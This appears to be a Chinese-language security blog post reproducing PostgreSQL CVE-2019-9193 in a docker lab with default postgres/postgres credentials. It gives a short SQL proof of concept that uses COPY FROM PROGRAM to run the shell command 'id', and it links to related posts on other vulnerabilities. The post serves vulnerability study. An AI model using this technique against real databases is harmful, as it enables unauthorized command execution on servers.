PostgreSQL 高权限命令执行漏洞(CVE-2019-9193)


PostgreSQL 高权限命令执行漏洞(CVE-2019-9193)

PostgreSQL 是一款关系型数据库。其 9.3 到 11 版本中存在一处 特性,管理员或具有 COPY TO/FROM PROGRAM 权限的用户,可以使用这个特性执行任意命令。

漏洞环境

启动存在漏洞的环境:

docker-compose up -d

环境启动后,将开启 Postgres 默认的 5432 端口,默认账号密码为 postgres/postgres

漏洞复现

首先连接到 postgres 中,并执行参考链接中的 POC:

DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;

FROM PROGRAM 语句将执行命令 id 并将结果保存在 cmd_exec 表中:


文章作者: Geekby
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Geekby !
 上一篇
PostgreSQL 提权漏洞(CVE-2018-1058) PostgreSQL 提权漏洞(CVE-2018-1058)
PostgreSQL 提权漏洞(CVE-2018-1058)PostgreSQL 是一款关系型数据库。其 9.3 到 10 版本中存在一个逻辑错误,导致超级用户在不知情的情况下触发普通用户创建的恶意代码,导致执行一些不可预期的操作。 漏洞复
2019-03-03
下一篇 
Apache Spark 未授权访问漏洞 Apache Spark 未授权访问漏洞
Apache Spark 未授权访问漏洞Apache Spark 是一款集群计算系统,其支持用户向管理节点提交应用,并分发给集群执行。如果管理节点未启动 ACL(访问控制),我们将可以在集群中执行任意代码。 漏洞环境执行如下命令,将以 st
2019-03-03
  目录